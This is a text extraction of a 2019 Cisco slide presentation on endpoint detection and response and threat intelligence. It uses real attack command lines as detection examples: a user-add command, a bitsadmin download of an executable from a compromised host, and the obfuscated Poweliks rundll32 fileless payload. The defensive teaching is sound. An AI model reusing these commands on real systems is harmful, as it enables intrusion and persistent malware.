Cisco Threat Response Architecture...Strategy Knowledge Features Detection Engines Coverage The...
Transcript of Cisco Threat Response Architecture...Strategy Knowledge Features Detection Engines Coverage The...
© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Thorsten SchranzAdvanced Malware Prevention (AMP)2019-05-21
Cisco Threat Response ArchitectureWhy we need endpoint information
© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Behavior
Complexity
Company
ProductsMalware
Mindset
Strategy
Knowledge
Features
Detection Engines
Coverage
The history of Endpoint Protection
Probability
Detection?
Investigation?
Remediation?
…the Strategy, Products andMalware mustfit to be sucessful in theFuture…
© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
From Event to Context – what can be includedEvent(s)Event from variouspoint of products.
Context
Includes much information. Events are one part only.
© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Sensor
SharingIntelligence
Sensor
Generates processable Data
Intelligence
Processes theSensor Data
Sharing
Automated sharing and processing the Analysis Data with other Intelligences or Products
What is Threat Intelligence – Key Components
Outcome
Analysis dataIOC dataBehavior InformationRelationship between Artifacts
Outcome
Sensor
Intelligence
Sharing
© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
SharingThreat Information
Cisco Products
3rd Integrations
Intelligence to Intelligence OR Intelligence to Product
Sensorson a world wide base
Network (NetFlow)
Content (Web, E-mail)
DNS based
File Analysis
3rd Party Feeds
Trusted Sources
Intelligences
Co-Occurrence Model
Anomaly Detection, Trust Modeling, Events Classification, Relationship
Modeling
Correlations, Artificial Intelligence3rd Party Intelligence
Extensive Automation Framework, Large Scale Datamining, Big Data
Analytics and automated detection
Generating an understanding
real world secenarios
OnPremise Intelligences
Threat Intelligence
© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Postulation – Single spot is not enough
Known Good
Unknown
Known Bad
Complexity
Protection
+
Sensor
Intelligence
Single Spot 1:1 Analysis Multi Spot n:n Analysis
Endpoint
Web
IPS
NGFW
Protection
© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Postulation – Single spot is not enough
© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Single Spot(Sensor)
Multi Spot(Sensor)
Context
Includes much information. Events are one part only.
Classify basedon context
© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Endpoint Challenge Example – 1:1 Volume
Counters by Talos
• To much data to handle OnPremise
• To much data to handle directly on the client
• Threat Landscape is to complex to be handled on the endpoint only
• Another approach necessary
46M OS operation events
• 8.7M File events
• 11.5K Process events
• 114K Network events
• 35M Registry events
• 1.5M unique Samples Daily
• 20B Threats blocked/day
• 150B DNS entries daily
• 18.5B AMP queries/day
• 16B URLs/Web requests daily
• Threat Data processed: 120TB/day, 3.6PB/month
4,9
96,8
95,5
29
un
iqu
eh
ash
es
/ w
ee
k
20min. with Win 10(Procmon)
Result
© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
46M OS operation events
• 8.7M File events
• 11.5K Process events
• 114K Network events
• 35M Registry events
• To much data to handle OnPremise
• To much data to handle directly on the client
• Threat Landscape is to complex to be handled on the endpoint only
• Another approach necessary
Endpoint Challenge Example – 1:n Complexity
Result20min. with Win 10
(Procmon)Counters by Talos
• 1.5M unique Samples Daily
• 20B Threats blocked/day
• 150B DNS entries daily
• 18.5B AMP queries/day
• 16B URLs/Web requests daily
• Threat Data processed: 120TB/day, 3.6PB/month
4,9
96,8
95,5
29
un
iqu
eh
ash
es
/ w
ee
k
© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Behavior Cluster
Malicious behaviour cluster including hundrets/thousands/million artifacts and also including one or more Threat Events
No Event
No Information
No Event
No Information
No Event
No Information
No Event
No Information
No Event
No Information
No Event
No Information
N + = X
Information
Threat Feeds
Intelligences
Analytic Systems
Researcher
Event
Event Details
Endpoint Chellange Example – 1:n Time Window
© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
N + = X
Information
Threat Feeds
Intelligences
Analytic Systems
Researcher
Event
Event Details
Engines / Technologies
Protection Engines1 to X
Advanced Analytics
When needed?
Configuration
Endpoint Configuration
Cloud and Intelligence
When querying cloud
or other intelligences
Start
Something comes up
at the endpoint.
1 of 46 Million
Endpoint Challenge Example – 1:n Timeline
© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Bad or not?
C:\Windows\system32\cmd.exe /c net user 'jmaldive' /add
Windows command-lineLegitimes Windows Feature
User Mgmt.Tool
Argument: User mit Namenjmaldive hinzufügen
© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Bad or not?
"C:\Windows\System32\bitsadmin.exe" /transfer kiWDPYASe /download/priority foreground https://www.uz.gov.ua/en/:7777/content C:\trust.exe
Windows Update Command Line Arguments
Domain• Category: Business• Reputation: good• IP-Reputation: good• Status: Compromised?
Payload
© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
rundll32.exe javascript:\..\mshtml,RunHTMLApplication
;eval(epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu
)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]|bc9:13c5.1:db.5
cc7.c89e.b9g6:18:b9e6~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*.replace(/./g,functi
on(_){return%20String.fromCharCode(_.charCodeAt()-1);}))
Bad or not?
WindowsComponent
Java
Command Line Argument
Poweliks is a fileless click-fraud malware
variant which resides within the registry. It
maintains persistence by creating a registry
key that makes use of rundll32 to execute
javascript code to read Powershell from the
Windows registry, which subsequently
executes portable executable code in memory.
© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
What is part of my Security Architecture??
What happens
Threats?
Fileless ?
Legitimate OS Feature Usage?
What we talk about
Specific Single Topics!
E.g. Mimikatz
E.g. Detection Rate
** Source: https://mitre-attack.github.io/attack-navigator/enterprise/
Impact
Product Strategy
Solution Design
Correlations in SIEM
Mitre: Techniques linked to tactics**
11 Tactics
300 Techniques
….where we may not talk about….
Combinations of Tactics and Techniques
Timeline
© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Mitre ATT&CK
Mitre ATT&CK
Tactics linkedto techniques.
tactics persistence
initial-access
command-and-control
exfiltration
collection
lateral-movement
execution
credential-access
discovery
privilege-escalation
defense-evasion
© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Mitre ATT&CK
tactics persistence
.bash_profile and .bashrc
accessibility features
account manipulation
appcert dlls
appinint dlls
application shimming
authentication package
bits jobs
bootkit
browser extension
change default file association
component firmware
component object model highjacking
create account
dll search order hijacking
dylib hijacking
external remote access
file system permission weakness
hidden files and directories
hooking
hypervisor
Image file execution options
kernel modules and extension
launch agent
launch demon
lauchctl
lc_load_dylib_addition
local job sheduling
login item
logon script
lass driver
modify existing service
netsh helper dll
new service
office application startup
path interception
plist modification
port knocking
port monitors
rc.common
re-open applications
redundant access
registry run keys / startup folder
scheduled tasks
screensaver
security support provider
service registry permission weakness
setui and setgid
shortcut modification
sip and trust provider hijacking
startup items
system firmware
time providers
trap
valid accounts
web shell
windows management instrumentation
winlogon helper dll
bits jobs
Create account
Kernel modules and extensions
login script
new service
Scheduled tasks
© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
What is part of my architecture??
Network Layer
NGFW
NGIPS E-MailWebThreat Grid
SecurityCameras
Thermostats
VoIP Phones
Printers
SOC
Monitoring and Threat Hunting
Windows command-line
Legitimate Windows FeatureC&C Info in Graphics
twitter.com
Mobile Users
Endpoint
© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
The Race – Threats and Endpoint Strategy
Endpoint
#Legitimate OS Feature usage
#Command Line
#Behavior
#communication
#file creation
#fileless
#timline
#Just-in-Time
#artifacts
#payload
© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Endpoint Connector Endpoint Backend
Protection
Engines
Endpoint
Monitoring
Backend
Intelligence
Endpoint
TimeResource
Step 3: Endpoint Monitoring
Step 2: Backend Intelligence
Step 1: Endpoint Connector and Backend
Step 4: Moving Time and Resource intensive Processes from the Endpoint to the Backend
SOAR
and SIEM
Capabilities
Files
Process
Network
CMD
IOC
Step 5: Analysis 7x24x365 in Backend
Backend
Management
TimeResource
The Race – Threats and Endpoint Strategy
© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Endpoint Connector Endpoint Backend
Protection
Engines
Endpoint
Monitoring
Backend
Intelligence
SOAR
and SIEM
Capabilities
Files
Process
Network
CMD
IOC
Backend
Management
AMP Architecture and Platform
Threat
Intelligence
and
Research
Advanced
Analytics
Agentless
Detection
Web
IPS
NGFW
Perimeter
&
Network
3rd Party
Integration
Standards
APIs
The Race – Threats and Endpoint Strategy
© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Meraki Systems Manager
Tetration
Web Security
Email Security+CLOUD
Advanced ThreatAMP FOR ENDPOINTS • AMP CLOUD
THREAT GRID • COGNITIVE
Identity Services Engine +pxGRID
Umbrella+INVESTIGATE
Digital Network ArchitectureCATALYST • NEXUS • MERAKI MS
AIRONET/WLC • MERAKI MR
Firepower NGFW/NGIPS
Threat Response
Stealthwatch+CLOUD
Secure SD-WAN / RouterISR • CSR • ASR • vEDGE
MERAKI MX
Integrated Architecture
CloudlockThreat Response – The Future
© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
The Race – Threats and Endpoint Strategy
Threat
Response
Threat
Intelligence
and
Research
Advanced
Analytics
Agentless
Detection
Web
IPS
NGFW
Perimeter
&
Network
^
3rd Party
Integration
Standards
APIs
AMP
for
Endpoints
© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Event
AnalysisReport Trajectory-
Threat Hunt
The Race – Threats and Endpoint Strategy
Web Analysis
© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Real World Example
© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Disk Memory
Sophisticated Malware Example – Infection/Protection (CL)
Code Installation
Malware installedCode
Injection
Binary Data
Dynamic created Content
Loaded from 3rd party
Obfuscated Content
Encrypted Content
Looks like “waste”
Partial Download
HTTPS Traffic
Hidden Protocol in HTTPS
Category: Business
Reputation: good
IP-Reputation: good
Status: Compromised
Good?
Malicious?
Unknown? WORKING Hidden, Stealthy, time-delayed
DECOY User
PREVENT Detection
New Sample in the world
In Memory
Evasion
Code generated
Code
Injection
.HLP .MSI
New Attack vector
New vulnerabilities
.SVC
.DLL=
.ISO.OCX.EXEews.exe
Dropped Payload,
autom. executed,
generates new Files
.EXE
OInfoP11.exe
created
OInfo11.ocx
created, holds
Decryption Info
OInfo11.iso
extracted,
encrypted,
compressed
© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Disk Memory
Sophisticated Malware Example – Infection/Protection (CL)
Code Installation
Malware installedCode
Injection
Binary Data
Dynamic created Content
Loaded from 3rd party
Obfuscated Content
Encrypted Content
Looks like “waste”
Partial Download
HTTPS Traffic
Hidden Protocol in HTTPS
Category: Business
Reputation: good
IP-Reputation: good
Status: Compromised
Good?
Malicious?
Unknown? WORKING Hidden, Stealthy, time-delayed
DECOY User
PREVENT Detection
New Sample in the world
In Memory
Evasion
Code generated
Code
Injection
.HLP .MSI
New Attack vector
New vulnerabilities
.SVC
.DLL=
.ISO.OCX.EXEews.exe
Dropped Payload,
autom. executed,
generates new Files
.EXE
OInfoP11.exe
created
OInfo11.ocx
created, holds
Decryption Info
OInfo11.iso
extracted,
encrypted,
compressed
Event
OnAcces Scan?
OnDemand Scan?
Event not handled?Behavior Cluster
Malicious behaviour cluster including hundrets/thousands/million artifacts and also including one or more Threat Events
© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Disk Memory
Code Installation
Malware installedCode
Injection
Binary Data
Dynamic created Content
Loaded from 3rd party
Obfuscated Content
Encrypted Content
Looks like “waste”
Partial Download
HTTPS Traffic
Hidden Protocol in HTTPS
Category: Business
Reputation: good
IP-Reputation: good
Status: Compromised
Good?
Malicious?
Unknown? WORKING Hidden, Stealthy, time-delayed
DECOY User
PREVENT Detection
New Sample in the world
In Memory
Entrenchment
Code generated
Code
Injection
.HLP .MSI
New Attack vector
New vulnerabilities
.SVC
.DLL=
.ISO.OCX.EXEews.exe
Dropped Payload,
autom. executed,
generates new Files
.EXE
OInfoP11.exe
created
OInfo11.ocx
created, holds
Decryption Info
OInfo11.iso
extracted,
encrypted,
compressed
Status: Clean
No Sample, no Signature
Infection Vector unknown
Time-to-detect infected host
Single File not malicious
C&C Communication
Data Loss
Which Artifacts are left for investigation?
Which Information is available for investigation?
Artifact Dependencies
File less and persistant
Sophisticated Malware Example – Infection/Protection (CL)
© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Disk Memory
Code Installation
Malware installedCode
Injection
Binary Data
Dynamic created Content
Loaded from 3rd party
Obfuscated Content
Encrypted Content
Looks like “waste”
Partial Download
HTTPS Traffic
Hidden Protocol in HTTPS
Category: Business
Reputation: good
IP-Reputation: good
Status: Compromised
In Memory
Evasion
Code generated
Code
Injection
.HLP .MSI
.SVC
.DLL=
.ISO.OCX.EXEews.exe
Dropped Payload,
autom. executed,
generates new Files
.EXE
OInfoP11.exe
created
OInfo11.ocx
created, holds
Decryption Info
OInfo11.iso
extracted,
encrypted,
compressed
Endpoint Detection and Response Approach
Monitoring Engine
Disk Activity
Process Activity
Command Line Monitoring
ConnectedIntelligences
Storess and processes
Monitoring data
30
© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
31
Disk Memory
Code Installation
Malware installedCode
Injection
Binary Data
Dynamic created Content
Loaded from 3rd party
Obfuscated Content
Encrypted Content
Looks like “waste”
Partial Download
HTTPS Traffic
Hidden Protocol in HTTPS
Category: Business
Reputation: good
IP-Reputation: good
Status: Compromised
In Memory
Entrenchment
Code generated
Code
Injection
.HLP .MSI
.SVC
.DLL=
.ISO.OCX.EXEews.exe
Dropped Payload,
autom. executed,
generates new Files
.EXE
OInfoP11.exe
created
OInfo11.ocx
created, holds
Decryption Info
OInfo11.iso
extracted,
encrypted,
compressed
Status: Clean
Endpoint Detection and Response Approach
ConnectedIntelligences
Storess and processes
Monitoring data
Monitoring Engine
Disk Activity
Process Activity
Command Line Monitoring
© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
32
Disk Memory
Code Installation
Malware installedCode
Injection
Category: Business
Reputation: good
IP-Reputation: good
In Memory
Entrenchment
Code generated
Code
Injection
.HLP .MSI
.SVC
.DLL=
.ISO.OCX.EXEews.exe
Dropped Payload,
autom. executed,
generates new Files
.EXE
OInfoP11.exe
created
OInfo11.ocx
created, holds
Decryption Info
OInfo11.iso
extracted,
encrypted,
compressed
Status: Clean
Endpoint Detection and Response Approach
ConnectedIntelligences
Storess and processes
Monitoring data
Monitoring Engine
Disk Activity
Process Activity
Command Line Monitoring
THREAT Response Architecture
Endpoint Architecute
Files
Process
Network
CMD
IOC
SOAR
and SIEM
Capabilities
Backend
Management
© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
IOC Event Detail Examples
Generic IOC: Powershell Download
Monitoring (Sensor)
Intelligence
© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Incident Management withoutCisco Threat Response
© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Deliver
System back to user
Deliver to User
Format Device
Find
Where, who, howwhen….
Find the Malware
Disk Forensics
OnDemand ScanManual SearchKnowledge?
Full Disk Forensics
Availability
Client not availableUser on PTONo Sensordifferent Department
Availability
Ticketing
Defined Process?
Open Ticket
Verify
Verify the event e.g. if further analysis is necessary
Verify
Searching
Search in Siem or other available InformationSourse, Logfiles andso on.
Search in SIEM
Alert
Malware Alert from a single point of product
Malware Alert
Incident Response (IR) without Cisco Threat Response (CTR)
Timeline (Hours? Days? Weeks?)
Format
Most information lost
© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Q1 - Commodity/Targeted?Q2 - Persistency?Q3 - Ransom/Backups?Q4 - Lateral movement?Q5 - Clean/Format?
Steps
What to do next?
Next Steps
a.ExeHash: 92a6…………7a
Result
Result
Analysis Tools
Process Explorer
Wireshark
Full Disk Forensics
Other Tools
ToolsSearch on ClientSearch in SIEM
Q1 - DHCP info?Q2 - AD info?Q3 - CMDB info?Q4 - Vulnerability info?Q5 - AV info?Q6 - Who is doing the C&C?
Alert by Next-Gen Network• C&C Traffic Detected:• Destination : 52.28.249.128Threat
Intelligence?• Source : 10.0.2.11Q, Q, Q, Q, Q, Q, ?• Pcap Capture available?
C&C Traffic Alert
Timeline (Hours? Days? Weeks?)
IR without CTR – C&C traffic alert!!
Searching
Sources?Intelligences?Correlations?
Payload
OS
Hardware
© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Visibility with EPP ApproachD
evic
e T
raje
cto
ry
Worstcase – Single Threat Event
Event does not show what really happened
Detection is often not Real-Time
No dependencies between artifacts and behaviour
Missing Information for OnPremise Intelligence
Missing legitimate OS functions and behaviour (chkdsk)
Threat Event?
Threat Event?Threat Event?
© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Understand Threat with EPP/EDR approachD
evic
e T
raje
cto
ry
IOC Vulnerability
Application with vulnerability
Execution
Application X was executed by application Y
PDFcreated
Network
Established networkconnections
Activity
Create, execute and network connection
Activity
Malicious File starts chkdsk.exe
Chkdsk.exe
Network connection and drops/executes a malicious file.
© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Demo: from Webtraffic to the endpoint
© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Thank you…the Strategy, Products and Malware must
fit to be successful in the future..
cisco.com/go/ampendpoint